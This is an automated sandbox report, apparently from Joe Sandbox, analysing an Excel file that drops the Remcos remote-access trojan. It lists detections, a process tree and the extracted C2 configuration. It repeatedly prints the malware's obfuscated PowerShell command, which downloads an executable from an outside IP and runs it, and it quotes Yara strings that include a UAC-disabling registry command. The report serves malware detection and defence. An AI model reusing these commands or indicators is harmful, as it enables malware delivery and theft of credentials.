Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.xls

Overview

General Information

Sample name:Quotation.xls
Analysis ID:1482857
MD5:36cace5745dcb32c2ab03ca4ba433394
SHA1:2e479ac4ea9b158f39093dded3b55c360a1f2082
SHA256:c2f6ea297ebee1570036db204177fde0e0263006637806e9b28365bb4ef14d7c
Tags:xls
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious Excel or Word document
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious command line found
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2932 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3296 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3376 cmdline: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3400 cmdline: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3512 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • winiti.exe (PID: 3608 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 4FB3E6E7B8F9C12CD2D5E161F7B94760)
            • InstallUtil.exe (PID: 3660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: AF862061889F5B9B956E9469DCDAE773)
    • mshta.exe (PID: 3828 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3912 cmdline: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3936 cmdline: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 4020 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 4032 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • winiti.exe (PID: 4076 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 4FB3E6E7B8F9C12CD2D5E161F7B94760)
            • MSBuild.exe (PID: 1808 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: C1BE61F3DE532751D6C1A35B851B0367)
            • AddInProcess32.exe (PID: 2480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "unifrieghtmovers.com:2558:1", "Assigned name": "Gasplant", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-E2SMAR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
        00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
        00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
        • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6637c:$s1: CoGetObject
        • 0x66390:$s1: CoGetObject
        • 0x663ac:$s1: CoGetObject
        • 0x70338:$s1: CoGetObject
        • 0x6633c:$s2: Elevation:Administrator!new:
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        25.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          25.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            25.2.AddInProcess32.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4a8:$a1: Remcos restarted by watchdog!
            • 0x6ca20:$a3: %02i:%02i:%02i:%03i
            25.2.AddInProcess32.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6656c:$str_b2: Executing file:
            • 0x675ec:$str_b3: GetDirectListeningPort
            • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x67118:$str_b7: \update.vbs
            • 0x66594:$str_b9: Downloaded file:
            • 0x66580:$str_b10: Downloading file:
            • 0x66624:$str_b12: Failed to upload file:
            • 0x675b4:$str_b13: StartForward
            • 0x675d4:$str_b14: StopForward
            • 0x67070:$str_b15: fso.DeleteFile "
            • 0x67004:$str_b16: On Error Resume Next
            • 0x670a0:$str_b17: fso.DeleteFolder "
            • 0x66614:$str_b18: Uploaded file:
            • 0x665d4:$str_b19: Unable to delete:
            • 0x67038:$str_b20: while fso.FileExists("
            • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
            25.2.AddInProcess32.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
            • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x6637c:$s1: CoGetObject
            • 0x66390:$s1: CoGetObject
            • 0x663ac:$s1: CoGetObject
            • 0x70338:$s1: CoGetObject
            • 0x6633c:$s2: Elevation:Administrator!new:
            Click to see the 43 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: File With Uncommon Extension Created By An Office Application
            Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2932, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].hta
            Sigma detected: Suspicious MSHTA Child Process
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRml
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2932, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3296, ProcessName: mshta.exe
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; 